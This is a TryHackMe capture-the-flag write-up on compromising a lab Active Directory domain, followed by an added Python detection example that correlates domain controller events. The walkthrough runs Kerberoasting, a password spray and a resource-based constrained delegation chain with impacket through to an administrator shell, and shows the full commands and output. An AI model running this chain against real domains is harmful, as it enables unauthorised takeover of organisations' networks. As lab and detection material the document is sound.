June 6, 2026
TryHackMe CTF Challenge: Jr Penetration Tester ‐ Forward (Write‐ups)
This post details the steps taken to compromise the target system and obtain the administration flag.
Fuad Khan
Initial Access: Domain user access was provided
Upon login, a .kdbx file was discovered in the Documents folder.
We found the KeePass 2 application installed, which could be logged into using only a standard Windows user account, without requiring credentials. I made a FOOLISH attempt to crack the Database.kdbx file, where I wasted TIME and ENERGY.
Side Note: A kerberoastable account was identified. Attempts were made to crack the hash, resulting in further WASTED TIME and ENERGY.
impacket-GetUserSPNs ctf.local/j.smith:'JSmith@IT2024' -dc-ip 10.48.168.46 -request
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------- ------------ -------- -------------------------- -------------------------- -----------
helpdesk/DC01 svc.helpdesk 2026-05-21 00:35:56.137405 2026-05-21 00:35:14.951529 constrained
helpdesk/DC01.ctf.local svc.helpdesk 2026-05-21 00:35:56.137405 2026-05-21 00:35:14.951529 constrained
[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc.helpdesk$CTF.LOCAL$ctf.local/svc.helpdesk*$cec80a9cbfa1e9d666e9de45e40f24b6$...
The AddAllowedToAct ACL was found during path discovery in BloodHound Pathfinder, leading to administration rights.
To exploit this, we first needed access to the user r.williams. We attempted a password-spray attack against all the domain users, using the common passwords we had gathered. Luckily, we discovered that r.williams shared the same password as t.jones, which was extracted from the .kdbx file.
nxc smb 10.48.166.217 -u users -p pass2 --continue-on-success
SMB 10.48.166.217 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:ctf.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.48.166.217 445 DC01 [-] ctf.local\j.smith:XXXXXXX STATUS_LOGON_FAILURE
SMB 10.48.166.217 445 DC01 [+] ctf.local\t.jones:XXXXXXX
SMB 10.48.166.217 445 DC01 [+] ctf.local\r.williams:XXXXXX
SMB 10.48.166.217 445 DC01 [+] ctf.local\j.smith:JSmith@IT2024
Finally, applying the method derived from BloodHound revealed local administrator access and allowed us to find the flag.
impacket-addcomputer -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host DC01.ctf.local -domain-netbios ctf.local 'ctf.local/r.williams:XXXXXXXX' -dc-ip 10.48.166.217
[*] Successfully added machine account ATTACKERSYSTEM$ with password Summer2018!.
impacket-rbcd -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'DC01$' -action 'write' 'ctf.local/r.williams:XXXXXXXX' -dc-ip 10.48.166.217
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ATTACKERSYSTEM$ can now impersonate users on DC01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ATTACKERSYSTEM$ (S-1-5-21-1966530601-3185510712-10604624-3109)
impacket-getST -spn 'cifs/DC01.ctf.local' -impersonate 'ADMINISTRATOR' 'ctf.local/attackersystem$:Summer2018!' -dc-ip 10.48.166.217
[*] Getting TGT for user
[*] Impersonating ADMINISTRATOR
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in ADMINISTRATOR@cifs_DC01.ctf.local@CTF.LOCAL.ccache
export KRB5CCNAME=ADMINISTRATOR@cifs_DC01.ctf.local@CTF.LOCAL.ccache
impacket-psexec -k CTF.LOCAL/ADMINISTRATOR@DC01.ctf.local -dc-ip 10.48.166.217 -target-ip 10.48.166.217
[*] Requesting shares on 10.48.166.217.....
[*] Found writable share ADMIN$
[*] Uploading file sEmbTsYA.exe
[*] Opening SVCManager on 10.48.166.217.....
[*] Creating service Rxuo on 10.48.166.217.....
[*] Starting service Rxuo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type flag.txt
THM{XXXXXXXXXXXXXXXXXXXXXXXXX}
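From the defender's side, the chain above leaves three Security events on the domain controller: 4741 (machine account created), 5136 (msDS-AllowedToActOnBehalfOfOtherIdentity modified) and 4769 (service ticket requested with Transited Services set). The following is an added example, not part of the original write-up, that correlates them; the event records, the DC01 distinguished name, WS042$ and the provisioners allow-list are constructed assumptions.

```python
from collections import defaultdict

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"

# Constructed, simplified Security-log records in time order. Field names follow
# the Windows event XML; the DC01 distinguished name and WS042$ are made up.
EVENTS = [
    {"id": 4741, "SubjectUserName": "r.williams", "TargetUserName": "ATTACKERSYSTEM$"},
    {"id": 5136, "SubjectUserName": "r.williams",
     "ObjectDN": "CN=DC01,OU=Domain Controllers,DC=ctf,DC=local",
     "AttributeLDAPDisplayName": RBCD_ATTR},
    {"id": 4769, "TargetUserName": "ATTACKERSYSTEM$@CTF.LOCAL",
     "ServiceName": "DC01$", "TransmittedServices": "ATTACKERSYSTEM$@CTF.LOCAL"},
    # Benign noise: an admin joins a workstation, a user requests a normal ticket.
    {"id": 4741, "SubjectUserName": "Administrator", "TargetUserName": "WS042$"},
    {"id": 4769, "TargetUserName": "t.jones@CTF.LOCAL",
     "ServiceName": "DC01$", "TransmittedServices": "-"},
]


def find_rbcd_chains(events, provisioners=frozenset({"Administrator"})):
    """Return one finding per delegated ticket that completes the chain.

    provisioners is a hypothetical allow-list of accounts expected to create
    machine accounts; anything else creating one is tracked.
    """
    created = {}                      # new machine account -> creating user
    rbcd_writes = defaultdict(list)   # user -> DNs whose RBCD attribute they set
    findings = []
    for ev in events:
        if ev["id"] == 4741 and ev["SubjectUserName"] not in provisioners:
            created[ev["TargetUserName"].upper()] = ev["SubjectUserName"]
        elif ev["id"] == 5136 and ev.get("AttributeLDAPDisplayName") == RBCD_ATTR:
            rbcd_writes[ev["SubjectUserName"]].append(ev["ObjectDN"])
        elif ev["id"] == 4769 and ev.get("TransmittedServices", "-") not in ("", "-"):
            # Transited Services is only populated when delegation was used.
            machine = ev["TargetUserName"].split("@")[0].upper()
            creator = created.get(machine)
            if creator and rbcd_writes.get(creator):
                findings.append({"machine": machine, "created_by": creator,
                                 "rbcd_written_on": list(rbcd_writes[creator]),
                                 "delegated_service": ev["ServiceName"]})
    return findings


if __name__ == "__main__":
    for finding in find_rbcd_chains(EVENTS):
        print(finding)
```

Event 5136 is only logged when directory service change auditing is enabled and the object carries a matching SACL, so confirm that before relying on the middle step.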